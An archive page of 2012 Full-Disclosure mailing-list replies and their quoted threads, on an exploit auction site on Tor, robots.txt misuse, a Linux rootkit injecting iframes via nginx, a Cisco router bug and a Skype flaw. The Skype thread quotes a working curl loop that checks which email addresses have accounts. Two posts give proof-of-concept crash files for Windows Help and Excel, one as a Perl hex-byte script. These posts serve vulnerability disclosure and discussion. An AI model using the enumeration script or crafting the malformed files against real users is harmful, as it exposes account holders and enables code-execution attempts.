Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Selling Exploit on Deep Web

2012-12-21 Thread Benji 
in other news, have you heard of the super cool site hacktalk.net where
they almost have 1000 members?


On Thu, Dec 20, 2012 at 3:13 PM, Luis Santana  wrote:

> Not a single fucking exploit on the entire site. gg sir, gg
>
>
> On Dec 10, 2012, at 2:17 PM, tig3rh...@tormail.org wrote:
>
> > In Deep Web has created a new online site a few days ago that allows you
> > to sell even exploits, malware, etc. etc..
> > The site works like Ebay so everything is auctioned.
> >
> > you can get from tor: http://qatuopo4wmzkirlo.onion
> >
> > Or by proxy (tor2web): https://qatuopo4wmzkirlo.tor2web.org
> >
> > ___
> > Full-Disclosure - We believe in it.
> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> > Hosted and sponsored by Secunia - http://secunia.com/
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Google's robots.txt handling

2012-12-11 Thread Benji 
What we need is a robots2.txt that defines what users are allowed to access
the robots.txt file.

Problem solved.


On Mon, Dec 10, 2012 at 11:33 PM, Gynvael Coldwind wrote:

> Hey,
>
> > > Here is an example:
> > >
> > > An admin has a public webservice running with folders containing
> > > sensitive informations. Enter these folders in his robots.txt and
> > > "protect" them from the indexing process of spiders. As he doesn't
> > > want the /admin/ gui to appear in the search results he also puts his
> > > /admin in the robots text and finaly makes a backup to the folder
> > > /backup.
>
> If no one would know about a folder, why would one add it to
> robots.txt in the first place?
> But that's missing the point anyway - robots.txt is not a security
> mechanism.
> If someone uses robots.txt as the only and last line of defense he
> plainly doesn't understand what he's doing (especially that it's one
> of the first files both pentesters & attackers look at).
>
> If someone has an /admin/ site (which is a really easily guessable
> name, checked by every web directory scanner out there) he cannot rely
> on concealment*, but on proper user authentication using mechanisms
> designed for such purpose (e.g. requiring a password).
>
> (* for historical reasons there is a Polish IT term for such attempts
> - "deep hiding", there's even a wiki page on that -
> http://pl.wikipedia.org/wiki/G%C5%82%C4%99bokie_ukrycie)
>
> > I'm wondering if, in perhaps .htaccess, one could allow ONLY site
> > crawlers access to the robots.txt file.  Then add robots.txt to
> > robots.txt...would this mitigate some of the risk?
>
> 1. It's still missing the point.
> 2. No, it wouldn't work in case of scanners that try to impersonate robots.
> --
> gynvael.coldwind//vx
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] linux rootkit in combination with nginx

2012-11-27 Thread Benji 
Yup, this is most likely. 

Sent from my iPhone

On 27 Nov 2012, at 15:41, "Gregor S."  wrote:

> More interesting than the rootkit itself is how it found it's way into the 
> box.
> 
> Chances are that Squeeze has a non-disclosed 0day, and that's worring me a 
> bit...
> 
> 
> On Mon, Nov 26, 2012 at 11:04 AM, dxp  wrote:
>> Looks like a new rootkit according to Kaspersky [1] and some analysis 
>> released by CrowdStrike [2].
>> 
>> [1] 
>> https://www.securelist.com/en/blog/208193935/New_64_bit_Linux_Rootkit_Doing_iFrame_Injections
>> [2] 
>> http://blog.crowdstrike.com/2012/11/http-iframe-injecting-linux-rootkit.html
>> 
>> PS: Interesting to know if others found this on their servers or is this an 
>> isolated incident !?
>> 
>> 
>> On Tue, Nov 13, 2012 at 10:19 AM, stack trace  wrote:
>>> Hi there,
>>> 
>>> We've discovered something which looks to us like a rootkit working 
>>> together with proxy software like nginx. Our OS is debian squeeze and nginx 
>>> 1.2.3.
>>> 
>>> Here is what happened:
>>> 
>>> We are running a web service and we got notified by some customers of us 
>>> that they are getting redirected to some malicious sites. Somehow a hacker 
>>> managed to inject an iframe into our http responses. 
>>> 
>>> I tried to do a telnet test on our nginx proxy and saw that even the "bad 
>>> request" response which gets served directly from nginx contained the 
>>> malicious iframe code.
>>> 
>>> server {
>>> listen  80 default backlog=2048;
>>> listen  443 default backlog=2048 ssl;
>>> server_name _;
>>> access_log  off;
>>> (...)
>>> location / {
>>> return  400;
>>> }
>>> }
>>> 
>>> Doing a bad request nginx doesn't go to cache in this case - the "return 
>>> 400" makes nginx reply with a predefined response (a string in memory). 
>>> 
>>> Even this response contained an iframe like this:
>>> HTTP/1.1 400 Bad Request
>>> Server: nginx/1.2.3
>>> Date: Wed, 07 Nov 2012 00:01:24 GMT
>>> Content-Type: text/html
>>> Content-Length: 353
>>> Connection: close
>>> 
>>> 
>>> 400 Bad Request
>>>

Re: [Full-disclosure] Remote Command Execution on Cisco WAG120N

2012-11-26 Thread Benji 
Command execution through Dynamic DNS setup is quite clearly not expected
functionality.


On Mon, Nov 26, 2012 at 11:28 AM, Gary Driggs  wrote:

> On Nov 26, 2012, at 1:47 AM, "Julius Kivimäki"
>  wrote:
>
> > Is a privilege escalation vulnerability in Linux not a vulnerability if
> it requires authentication?
>
> It was not made clear that it was a privilege escalation...
> "Authenticate and browse to /setup.cgi? ... All the fields you see are
> vulnerables to command execution as root." So what kind of credentials
> are used for the initial authentication? Unprivileged? Then it should
> be mentioned as such. Otherwise, I can point out a few dozen embedded
> systems with web UIs that allow me to make configuration changes after
> authentication because that's why they're there. Now if you can point
> out a way to bypass authentication or escalate privileges from an
> account that doesn't normally have write access, you've got a
> vulnerability. I was merely asking how this differed from any other
> auth wall.
>
> -Gary
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] phpmyadmin compromised?

2012-11-19 Thread Benji 
.. could you have provided any less information? why dont you look through
your code instead of emailing a screenshot to a mailing list? really?


On Mon, Nov 19, 2012 at 4:47 PM, Benji  wrote:

> .. coul
>
>
> On Mon, Nov 19, 2012 at 4:45 PM, Lucio Crusca  wrote:
>
>> Hello *,
>>
>> I've setup my browser to remember login & password at my server phpmyadmin
>> login page. It usually fills the two fields correctly, but today it showed
>> this crap instead:
>>
>>
>> http://img208.imagevenue.com/img.php?image=38933_php_myadmin_compromised_122_430lo.jpg
>>
>> Since I've already suffered a security breach through phpmyadmin in the
>> past, I immediately suspected another one. Please note that phpmyadmin is
>> shielded by http digest authentication since the previous accident.
>>
>> Are you aware of any security problems related to phpmyadmin (or to
>> Iceweasel 10 for that matter) that can cause such garbage on the login
>> page?
>>
>> Thanks in advance
>> Lucio.
>>
>>
>>
>>
>> ___
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>>
>
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] phpmyadmin compromised?

2012-11-19 Thread Benji 
.. coul


On Mon, Nov 19, 2012 at 4:45 PM, Lucio Crusca  wrote:

> Hello *,
>
> I've setup my browser to remember login & password at my server phpmyadmin
> login page. It usually fills the two fields correctly, but today it showed
> this crap instead:
>
>
> http://img208.imagevenue.com/img.php?image=38933_php_myadmin_compromised_122_430lo.jpg
>
> Since I've already suffered a security breach through phpmyadmin in the
> past, I immediately suspected another one. Please note that phpmyadmin is
> shielded by http digest authentication since the previous accident.
>
> Are you aware of any security problems related to phpmyadmin (or to
> Iceweasel 10 for that matter) that can cause such garbage on the login
> page?
>
> Thanks in advance
> Lucio.
>
>
>
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Skype account + IM history hijack vulnerability

2012-11-15 Thread Benji 
I'll make one point. Google 'oracle attack'. The only result that comes up 
related to your naming meaning is the one posted here. The rest are the obvious 
examples.

But whatever, you seem to be vulnerable to the one d eye oh 7 vulnerability.

Sent from my iPhone

On 15 Nov 2012, at 18:59, klondike  wrote:

> El 15/11/12 09:47, Benji escribió:
>> Sometimes when people argue over the definition of '0day', it is important 
>> to be clear.
> I never called my attack a 0-day, did I?
>> Although the bash script made it clear, I have never ever seen someone call 
>> 'user enumeration' an 'oracle attack'.
> Turns out I have never seen anybody call an 'oracle attack' 'user
> enumeration'.
>> Probably because this is 2012 and the Matrix hasn't just come out.
> Probably because the attack won't give you the whole list of usernames
> but instead tell you which e-mails (not necessarily being an username)
> on your list are on its list. Also turns out the concept of oracle has
> been in use on the computation world way before you think and before the
> OWASP guys arbitrarily decided such a name in, amongst others, the
> complexity theorems that keep the cryptography used nowadays secure, so,
> please, stop acting childishly over something as stupid as the name of
> the attack and concentrate instead on the exposed issue.
> 
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Skype account + IM history hijack vulnerability

2012-11-15 Thread Benji 
Furthermore, I didn't say you we're talking about a '0day'. It was an example. 

Re never seeing anyone call it user enumeration; do you live in a cave of some 
sort? This is what all a) major tools classify it as b) cve issuings classifies 
it as c) major infosec providers such as pentest companies.



Sent from my iPhone

On 15 Nov 2012, at 18:59, klondike  wrote:

> El 15/11/12 09:47, Benji escribió:
>> Sometimes when people argue over the definition of '0day', it is important 
>> to be clear.
> I never called my attack a 0-day, did I?
>> Although the bash script made it clear, I have never ever seen someone call 
>> 'user enumeration' an 'oracle attack'.
> Turns out I have never seen anybody call an 'oracle attack' 'user
> enumeration'.
>> Probably because this is 2012 and the Matrix hasn't just come out.
> Probably because the attack won't give you the whole list of usernames
> but instead tell you which e-mails (not necessarily being an username)
> on your list are on its list. Also turns out the concept of oracle has
> been in use on the computation world way before you think and before the
> OWASP guys arbitrarily decided such a name in, amongst others, the
> complexity theorems that keep the cryptography used nowadays secure, so,
> please, stop acting childishly over something as stupid as the name of
> the attack and concentrate instead on the exposed issue.
> 
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Skype account + IM history hijack vulnerability

2012-11-15 Thread Benji 
Also thank you for posting a link to a well known reference, that was super 
appreciated.

Next time link something like OWASP, at least most whitehats don't laugh at 
them so you gain more credibility.

Sent from my iPhone

On 15 Nov 2012, at 03:45, "Nick FitzGerald"  wrote:

> Benji wrote:
> 
>> Oracle attacks?
>> 
>> See into the future?
>> Padding oracle attacks?
>> Oracle SQL injections?
> 
> You noobs...
> 
>   http://www.drdobbs.com/understanding-oracle-attacks-on-informat/184405917
> 
> (Don't get too tied up in the crypto stuff in that article.)
> 
> klondike's point is that simply monitoring the response of the "user X 
> wants to change their password" web-form tells you whether there is, in 
> fact, a user named "X" on the system.  That's kinda obvious from the 
> bash script klondike provided, and I don't do bash...
> 
> 
> 
> Regards,
> 
> Nick FitzGerald
> 
> 
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Skype account + IM history hijack vulnerability

2012-11-15 Thread Benji 
Hi genius of the year

Sometimes when people argue over the definition of '0day', it is important to 
be clear. Although the bash script made it clear, I have never ever seen 
someone call 'user enumeration' an 'oracle attack'. Probably because this is 
2012 and the Matrix hasn't just come out.

Sorry for not knowing non-industry terms used by 1% of the populous you hipster.

Sent from my iPhone

On 15 Nov 2012, at 03:45, "Nick FitzGerald"  wrote:

> Benji wrote:
> 
>> Oracle attacks?
>> 
>> See into the future?
>> Padding oracle attacks?
>> Oracle SQL injections?
> 
> You noobs...
> 
>   http://www.drdobbs.com/understanding-oracle-attacks-on-informat/184405917
> 
> (Don't get too tied up in the crypto stuff in that article.)
> 
> klondike's point is that simply monitoring the response of the "user X 
> wants to change their password" web-form tells you whether there is, in 
> fact, a user named "X" on the system.  That's kinda obvious from the 
> bash script klondike provided, and I don't do bash...
> 
> 
> 
> Regards,
> 
> Nick FitzGerald
> 
> 
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Skype account + IM history hijack vulnerability

2012-11-14 Thread Benji 
Oracle attacks?

See into the future?
Padding oracle attacks?
Oracle SQL injections?


On Wed, Nov 14, 2012 at 3:44 PM, klondike  wrote:

> El 14/11/12 11:20, Kirils Solovjovs escribió:
> > The team has worked around this and are now trying to fix the
> > bug/feature. :)
> >
> >
> http://www.reddit.com/r/netsec/comments/13664q/skype_vulnerability_allowing_hijacking_of_any/
> Well, they also seem to be vulnerable to oracle attacks against the
> e-mail database through the same forgotten password form so I wouldn't
> be surprised if an spammer has already been exploiting this.
>
> Below is the classical bash script to exploit it, just input a newline
> separated list of e-mails and it will send the request and filter those
> which are clearly not in the database:
> $ while read mail trash; do curl
> 'https://login.skype.com/account/password-reset-request' -s -o- -b
> "skype-session-token=336ff76c68bf17b54eb0d2dc81f8bd6f1500a7fd" -d
> "email=$mail&session_token=336ff76c68bf17b54eb0d2dc81f8bd6f1500a7fd" |
> fgrep "The email address you entered is invalid." > /dev/null || echo
> $mail; done
>
> klondike
>
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] 0-day vulnerabilities in Call of Duty MW3 and CryEngine 3

2012-11-14 Thread Benji 
>> 0-day means it is being actively used in the wild.

No it does not.


On Wed, Nov 14, 2012 at 2:52 PM, Christian Sciberras wrote:

> 0-day means it is being actively used in the wild.
> Is this the case?
>
>
> Chris.
>
>
> On Wed, Nov 14, 2012 at 10:52 AM, ReVuln  wrote:
>
>>
>> Following our presentation at POC2012 [1] conference, we have released:
>> a paper [2] regarding a NULL pointer dereference vulnerability affecting
>> Call of Duty: Modern Warfare 3 [3], and a video [4] demonstrating a remote
>> code execution vulnerability affecting CryEngine 3 [5].
>>
>> [1] http://powerofcommunity.net
>> [2] http://revuln.com/files/ReVuln_CoDMW3_null_pointer_dereference.pdf
>> [3] http://www.callofduty.com/mw3
>> [4] http://vimeo.com/53425372
>> [5] http://www.crytek.com/cryengine/cryengine3
>>
>>
>> ---
>> ReVuln
>> http://revuln.com
>> http://twitter.com/revuln
>>
>>
>>
>>
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Skype account + IM history hijack vulnerability

2012-11-14 Thread Benji 
This has nothing to do with the client. The service is at fault.

Also for the record, r/netsec is a huge circlejerk.


On Wed, Nov 14, 2012 at 10:20 AM, Kirils Solovjovs <
kirils.solovj...@kirils.com> wrote:

>
> The team has worked around this and are now trying to fix the
> bug/feature. :)
>
>
> http://www.reddit.com/r/netsec/comments/13664q/skype_vulnerability_allowing_hijacking_of_any/
>
>
> P.S. Not to say that there aren't any other security bugs to come. Use a
> secure  client!
>
> --
> Kirils Solovjovs
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] TTY handling when executing code in lower-privileged context (su, virt containers)

2012-11-10 Thread Benji 
Furthermore, the handling of user privileges to disallow root logins is to
stop (stupid) users doing stupid things, security wise. If a lot of users
weren't forced to use unprivileged accounts, all the processes you're
talking about running would be run as root. AFAIK security is used to
protect from the lowest denominator up, not top down.


On Sat, Nov 10, 2012 at 6:49 PM, Benji  wrote:

> The advice weakens your system from a local perspective granted, but if an
> attacker has a local user on your box already, it's already game over.
>
> Yes, if you were a user with intelligence. I must've forgot that everyone
> that uses a computer does so with sense.
>
>
> On Sat, Nov 10, 2012 at 6:30 PM, Michal Zalewski wrote:
>
>> > I think you've taken that far too literaly. My understanding of it is to
>> > protect against a) brute force retardation b) dumb attackers.
>>
>> The advice weakens the security of your system, because it means I
>> just need to compromise your unprivileged account (in which you run
>> your browser, mail client, and so on) to own the entire box.
>>
>> As for the benefits, care to elaborate? I'm not sure what a) and b)
>> really mean. If you're worried about brute-force, don't use trivial
>> passwords. If you worry about opportunistic attacks, do that and then
>> patch your stuff every now and then.
>>
>> /mz
>>
>
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] TTY handling when executing code in lower-privileged context (su, virt containers)

2012-11-10 Thread Benji 
The advice weakens your system from a local perspective granted, but if an
attacker has a local user on your box already, it's already game over.

Yes, if you were a user with intelligence. I must've forgot that everyone
that uses a computer does so with sense.


On Sat, Nov 10, 2012 at 6:30 PM, Michal Zalewski wrote:

> > I think you've taken that far too literaly. My understanding of it is to
> > protect against a) brute force retardation b) dumb attackers.
>
> The advice weakens the security of your system, because it means I
> just need to compromise your unprivileged account (in which you run
> your browser, mail client, and so on) to own the entire box.
>
> As for the benefits, care to elaborate? I'm not sure what a) and b)
> really mean. If you're worried about brute-force, don't use trivial
> passwords. If you worry about opportunistic attacks, do that and then
> patch your stuff every now and then.
>
> /mz
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] TTY handling when executing code in lower-privileged context (su, virt containers)

2012-11-10 Thread Benji 
"This is why I find the standard security mantra of "disable root
logins and use su / sudo" to be extremely silly."

I think you've taken that far too literaly. My understanding of it is to
protect against a) brute force retardation b) dumb attackers. Noone said
it's supposed to completely protect uid=0. If you're seeing that as
"extremely silly" then you're interpreting the recommendation in the wrong
way.


On Sat, Nov 10, 2012 at 5:06 PM, Michal Zalewski wrote:

> > "Using su to execute commands as an untrusted user from an interactive
> > shell may allow the untrusted user to escalate privileges to the user
> > running the shell."
>
> If you have the ability to execute code on that terminal before the
> user executes su, it is also possible to simply never allow the real
> su application to run until you've already captured the credentials and
> escalated to root. For example, you could define an alias or
> change PATH in the shell; ptrace the shell or use LD_PRELOAD to change
> its semantics; or simply never return to the shell at all, and simply
> fake all the subsequent interactions with it (not particularly hard to
> do this in a convincing way).
>
> This is why I find the standard security mantra of "disable root
> logins and use su / sudo" to be extremely silly.
>
> In general, very few OSes are designed to handle such scenarios gracefully.
>
> /mz
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Microsoft Office Excel 2010 memory corruption

2012-10-29 Thread Benji 
"if at first you dont suceed, next time might be a fluke"

On Mon, Oct 29, 2012 at 2:49 AM, kaveh ghaemmaghami
 wrote:
> It reminds me my question from VUPEN Security Team when i got seek
> from their exploitions
>
> How can i make sure a crash is not exploitable? (( The short answer is
> simple assume every crash is exploitable and just fix it.))
>
> Best Regards
>
> On Mon, Oct 29, 2012 at 5:47 AM, kaveh ghaemmaghami
>  wrote:
>> Hello list
>>
>> Dear Peter and others please take a look @ it
>>
>> Best Regards
>> Kaveh Ghaemmaghami
>>
>> Title :  Microsoft Office Excel 2010 memory corruption
>> Version   :  Microsoft Office professional Plus 2010
>> Date  :  2012-10-27
>> Vendor:  http://office.microsoft.com
>> Impact:  Med/High
>> Contact   :  coolkaveh [at] rocketmail.com
>> Twitter   :  @coolkaveh
>> tested:  XP SP3 ENG
>> ###
>> Bug :
>> 
>> memory corruption during the handling of the xls files a
>> context-dependent attacker
>> can execute arbitrary code  (need investigate )
>> 
>> 
>> (b4c.1350): Access violation - code c005 (first chance)
>> First chance exceptions are reported before any exception handling.
>> This exception may be expected and handled.
>> eax=0584
>> ebx=00135070
>> ecx=1000
>> edx=105f
>> esi=06a80800
>> edi=0040
>> eip=301ce0d0
>> esp=001302f0
>> ebp=00131d6c iopl=0 nv up ei pl zr na pe nc
>> cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs= efl=00010246
>> *** ERROR: Symbol file could not be found.  Defaulted to export
>> symbols for Excel.exe -
>> Excel!Ordinal40+0x1ce0d0:
>> 301ce0d0 668b5008mov dx,word ptr [eax+8]  
>> ds:0023:058c=
>> 
>> Proof of concept included.
>> http://www36.zippyshare.com/v/48422905/file.html
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Microsoft Windows Help program (WinHlp32.exe) memory corruption

2012-10-27 Thread Benji 
Hi dear sir madam friend

Responsibly taking on authority, go play with fireworks in traffic

On 27 Oct 2012, at 17:58, adam  wrote:

> Hi
> Dear Sir,
> I have drank 5 cans of Pepsi today.
> I can discuss with authority responsible.
> Best Regards
> 
> On Sat, Oct 27, 2012 at 11:55 AM, kaveh ghaemmaghami 
>  wrote:
>> Hi
>> Dear Sir,
>> I have reached 12 crashes during Microsoft Windows Help program test.
>> I can discuss with authority responsible
>> Best Regards
>> 
>> On Sat, Oct 27, 2012 at 2:45 PM, kaveh ghaemmaghami
>>  wrote:
>> > Hello list!
>> >
>> > I want to warn you about Microsoft Windows Help program (WinHlp32.exe)
>> > memory corruption
>> >
>> > Best Regards
>> >
>> > Kaveh Ghaemmaghami aka (coolkaveh)
>> >
>> > -
>> > #!/usr/bin/perl
>> > #Title:  Microsoft Windows Help program(WinHlp32.exe)memory corruption
>> > #Version  :  5.1.2600
>> > #Date :  2012-10-21
>> > #Vendor   :  http://www.microsoft.com
>> > #Crash:  http://img69.imageshack.us/img69/7652/helpview.jpg
>> > #Impact   :  Med/High
>> > #Contact  :  coolkaveh [at] rocketmail.com
>> > #Twitter  :  @coolkaveh
>> > #tested   :  XP SP3 ENG
>> > #Author   :  coolkaveh
>> > ###
>> > #Info :
>> > #
>> > #The HLP file is Microsoft Help file documentation for the Windows
>> > operating system or Windows programs.
>> > #The file contains documentation for the Windows operating system or
>> > Windows programs.
>> > #
>> > #Bug :
>> > #
>> > #Memory corruption during the handling of the hlp files by Microsoft
>> > Windows default
>> > #help viewer (WinHlp32.exe)
>> > #Successful exploits can allow attackers to execute arbitrary code
>> > ###
>> > #(f3c.e64): Access violation - code c005 (first chance)
>> > #First chance exceptions are reported before any exception handling.
>> > #This exception may be expected and handled.
>> > #eax=
>> > #ebx=000a3d08
>> > #ecx=3fffeb6b
>> > #edx=0003
>> > #esi=000a8fa8
>> > #edi=000a9000
>> > #eip=77c47380
>> > #esp=0007f528
>> > #ebp=0007f530 iopl=0 nv up ei pl nz ac po nc
>> > #cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs= 
>> > efl=00010212
>> > #*** ERROR: Symbol file could not be found.  Defaulted to export
>> > symbols for C:\WINDOWS\system32\msvcrt.dll -
>> > #msvcrt!memmove+0xd0:
>> > #77c47380 f3a5rep movs dword ptr es:[edi],dword ptr [esi]
>> > #1:001>!exploitable -v
>> > #First Chance Exception Type: STATUS_ACCESS_VIOLATION (0xC005)
>> > #Exception Sub-Type: Write Access Violation
>> > #Description: User Mode Write AV
>> > #Short Description: WriteAV
>> > #Exploitability Classification: EXPLOITABLE
>> > #Recommended Bug Title: Exploitable - User Mode Write AV starting at
>> > msvcrt!memmove+0x00d0 (Hash=0x613a0f0c.0x41551815)
>> > #User mode write access violations that are not near NULL are exploitable.
>> > ###
>> > my $poc =
>> > "\x3F\x5F\x03\x00\x95\x03\x00\x00\xFF\xFF\xFF\xFF\xB8\x11\x00\x00\x85\x03\x00\x00\x7C\x03\x00\x00\x00".
>> > "\x6C\x03\x21\x00\x01\x00\xB6\x50\xAF\x36\x00\x00\x01\x00\x0D\x00\x57\x69\x6E\x64\x6F\x77\x73\x20\x32".
>> > "\x30\x30\x30\x00\x03\x00\x04\x00\x00\x00\x00\x00\x02\x00\x25\x00\x57\x65\x64\x6E\x65\x73\x64\x61\x79".
>> > "\x2C\x20\x4A\x61\x6E\x75\x61\x72\x79\x20\x32\x37\x2C\x20\x31\x39\x39\x39\x20\x30\x39\x3A\x34\x35\x3A".
>> > "\x32\x36\x00\x04\x00\x05\x00\x43\x53\x28\x29\x00\x04\x00\x05\x00\x43\x53\x28\x29\x00\x06\x00\x5A\x00".
>> > "\x7F\x0F\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x70\x72\x6F\x63\x34\x00\x00\x00\x00\x00\x00\x00\x00".
>> > "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
>> > "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x8D\x02\x66".
>> > "\x00\x68\x01\x58\x02\x04\x00\xFF\xFF\xE2\x00\xC0\xC0\xC0\x00\x06\x00\x5A\x00\x7F\x0F\x00\x00\x00\x00".
>> > "\x00\x00\x00\x00\x00\x00\x74\x72\x6F\x75\x62\x6C\x65\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
>> > "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
>> > "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x8D\x02\x66\x00\x68\x01\x58\x02\x04".
>> > "\x00\xFF\xFF\xE2\x00\xC0\xC0\xC0\x00\x06\x00\x5A\x00\x7F\x1B\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
>> > "\x62\x69\x67\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
>> > "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
>> > "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x

Re: [Full-disclosure] vOlk Botnet Framework v4.0 - Multiple Web Vulnerabilities

2012-10-21 Thread Benji 
also while we're at it can you please remove all references to common
sense and logic in any emails that are in the full disclosure archive.
wait...

On Sun, Oct 21, 2012 at 2:09 PM, ZeroDay.JP  wrote:
> Full Disclosure Maillist Admin, please kindly delete the posted email of
> "vOlk Botnet Framework v4.0 - Multiple Web Vulnerabilities" posted in Full
> Disclosure, for the security purpose.
>
> Understanding the positive purpose of the researchers who expose it ; Still,
> this vulns concept cannot be exposed in public, where the merit of its
> exposure is not equal to the DAMAGE caused by exposing such information. The
> disclosure damage itself is affecting other botnets takedown process which
> adding the challange & effort taken, so takedowns will be harder than
> before.
>
> VOlk-Botnet 4.0. is a malicious application whose origins have been traced
> back to Mexico. The system was designed w/common concept of a malicious
> botnets infrastructure.
>
> ---
> Hendrik ADRIAN - http://0day.jp
> OP #MalwareMustDie http://malwaremustdie.blogspot.com/
>
>
>
>
> Sent to you by ZeroDay.JP via Google Reader:
>
>
>
>
> vOlk Botnet Framework v4.0 - Multiple Web Vulnerabilities
>
> via Full Disclosure on 10/11/12
>
> Posted by Vulnerability Lab on Oct 11
>
> Title:
> ==
> vOlk Botnet Framework v4.0 - Multiple Web Vulnerabilities
>
> Date:
> =
> 2012-10-09
>
> References:
> ===
> http://www.vulnerability-lab.com/get_content.php?id=721
>
> VL-ID:
> =
> 721
>
> Common Vulnerability Scoring System:
> 
> 8.3
>
> Introduction:
> =
> vOlk-Botnet v4.0 is a remote administration tool, its main function is to
> manage the HOSTS file of the windows
> operating systems The code created...
>
>
>
>
> Things you can do from here:
>
> Subscribe to Full Disclosure using Google Reader
> Get started using Google Reader to easily keep up with all your favorite
> sites
>
>
>
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/

___
